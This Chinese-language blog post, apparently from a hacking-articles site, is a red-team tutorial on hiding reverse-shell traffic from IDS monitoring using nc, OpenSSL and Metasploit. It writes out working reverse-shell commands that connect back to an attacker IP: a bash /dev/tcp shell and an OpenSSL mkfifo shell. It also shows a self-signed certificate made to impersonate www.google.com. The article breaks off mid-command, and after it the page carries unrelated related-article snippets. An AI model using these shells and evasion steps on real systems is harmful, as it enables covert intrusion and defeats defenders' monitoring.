渗透测试之地基流量加密篇:SSL、MSF、CS三种方式进行流量加密

访客4年前黑客文章1049

系列文章

渗透测试之地基钓鱼篇:thinkphp平台XSS钓鱼

简介

渗透测试-地基篇

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式 *** ,望大家能共同加油学到东西。

请注意

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件会进行流量进行分析,检测带有攻击特征,很快被发现,如果蓝队对攻击流量回溯分析,就可以复现攻击的过程。

那么蓝队发现红队的行为特征判断后,进行阻断红队行为,红队就无法进行渗透行为了...今天将介绍常用的nc反弹shell、MSF监听反弹shell、Cobalt strike 4.0拿shell,三种方式如何进行流量加密,如何过IDS或者防护软件分析设备和工具的。

此次利用wireshark抓包进行模拟流量分析设备进行演示!!

二、环境介绍

1608213735_5fdb64e7aa0655a649f8f.png!small?1608213737710

黑客(攻击者):

IP:192.168.175.145

系统:kali.2020.4

VPS服务器:

此次模拟环境将直接越过VPS平台钓鱼拿到对方的shell过程!!

办公区域:

系统:windwos 2019

IP:192.168.2.142

linux系统:kali.2020.4(模拟linux服务器)

IP:192.168.2.141

目前黑客通过kali系统进行攻击行为,发现漏洞后获得了linux和windows 2019两个办公区域系统的权限,使用了nc反弹shell、MSF生成的shell、Cobalt Strike 4.0生成的shell进行反弹...获得了最终的控制权限,但是办公区域存在IDS等流量监测设备,为了防止被监控,将演示三种不同方式拿反弹shell后如何流量加密,不被IDS等流量监测设备发现!!

三、Nc正常拿shell

Nc(瑞士军刀)它也是一个功能强大的 *** 调试和探测工具,能够建立需要的几乎所有类型的 *** 连接,支持linux和windows环境,红队喜爱工具之一....

这里演示NC正常拿shell情况下,如何被对方流量监控到的....

1、初步环境

1609226518_5fead916e4ec43968aff6.png!small?1609226522381

该图可看到攻击者和被攻击者IP情况...

1609226548_5fead934196fc1c2f3864.png!small?1609226549366

攻击者开启NC监听本地8888端口!

nc -vlp 8888

1609226604_5fead96c4c3850aff3c67.png!small?1609226605262

被攻击者端开启Wireshark进行流量实时监听分析!

2、拿shell监听

1609226651_5fead99bd2ce4589e2891.png!small?1609226653151

使用Wireshark对eth0进行流量抓包分析,被攻击端执行一句话shell命令:

bash -i>& /dev/tcp/192.168.175.145/8888 0>&1

1609226824_5feada487d37be38e841a.png!small?1609226829225

攻击方利用nc,通过反弹shell方式获得了控制权限...

1609226879_5feada7fa14a9e059e5e0.png!small?1609226882478

攻击者进行信息收集命令操作,被攻击者Wireshark一直在监听着!!

3、流量分析

1609227136_5feadb80e82a5b7eb6060.png!small?1609227137810

这边我们来到被攻击者主机上查看下抓包信息,选择TCP流信息...

1609227177_5feadba9e791bd518e898.png!small?1609227179971

可看到未加密的情况下,流量设备是可以查看到攻击者的行为记录的!!!

那么接下来将演示如何进行流量加密!!

四、OpenSSL流量加密

OpenSSL进行加密拿shell,和NC的性质是类似的,都是通过/bin/bash获得shell,接下来将用OpenSSL进行演示流量加密!!

1、OpenSSL证书

1609227615_5feadd5fb45dd7ca2209a.png!small?1609227616904在kali上使用OpenSSL生成自签名证书:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

成功生成后,在桌面有两个pem加密文件key!!

2、成功提权

1609228410_5feae07a577f65af2479f.png!small?1609228415802

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888 #开启监听

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.175.145:8888 > /tmp/s; rm /tmp/s #反弹shell命令

成功通过Key加密获得了控制权限,并执行了相应的控制命令!!行为都被WireShark流量进行监控了!!

3、流量分析

1609228655_5feae16f99b21d06401a8.png!small?1609228659004

通过TCP流查看到的信息都是乱码,经过了加密!

五、Metasploit流量加密

Metasploit在内网做横行渗透时,这些流量很容易就能被检测出来,所以做好流量加密,就能

避免审计工具检测出来,开始演示!

1、创建 SSL/TLS 证书

1609229160_5feae36832b701ff902e8.png!small?1609229161612

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \

-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \

-keyout www.google.com.key \

-out www.google.com.crt && \

cat www.google.

相关文章

谁将问鼎?看4个摇摆州数字组合-美国选举最新消

谁将问鼎?看4个摇摆州数字组合,现在只有5个州的计票结果没有公布出来,但其中有一个州肯定是倒向特朗普的,而另外4个关键摇摆州中,拜登只需要拿下任意一个就可以胜选了,因为他离270票仅剩下最后的6票,这...

怎么找网络黑客帮忙-一名黑客需要掌握什么语言(黑客需要掌握什么技术和语言)

怎么找网络黑客帮忙-一名黑客需要掌握什么语言(黑客需要掌握什么技术和语言)

怎么找网络黑客帮忙相关问题 黑客数学怎么样相关问题 行李忘拉黑客车怎么 战双帕弥什官网群(战双帕弥什意识属性)...

中国山东国际经济技术合作公司

中国山东国际经济技术合作公司是1984-10-13在山东省注册成立的全民所有制,注册地址位于济南市龙奥北路8号山东高速大厦。中国山东国际经济技术合作公司的。 这是一家非常有活力的公司,成长前景非常好,...

孙记麻辣烫可靠吗?好品牌当然可靠

孙记麻辣烫可靠吗?好品牌当然可靠

近年来,越来越多的人想要通过创业来改变生活条件。那么现在什么行业适合创业?又该选择什么项目投资呢?投资是有风险的,但是投资有实力的品牌会大大的降低风险。毫无疑问的是利润是人们开店创业的源动力,人们对于...

溧水伴游-【郑文静】

“溧水伴游-【郑文静】”一:留订金(区别于口嗨和屌丝)模特资料学  历:本科深圳高端模特在线预约的平台小明前两天还向我询问起了苏州模特专业摄影团队,其实对于每一个苏州模特的专业摄影团队来说,他们也都是...

叶良辰开微博:在下自会还大家一个真相

不经意间的,叶良辰就爆火,和赵日天、龙傲天、福尔康并称之为“互联网F4”。 在“互联网F4”中,叶良辰是四少之首,赵日天不服气都不好。他最开始亮相于有着“百度卢浮宫”之称的李毅吧,由一场寝室值日引起...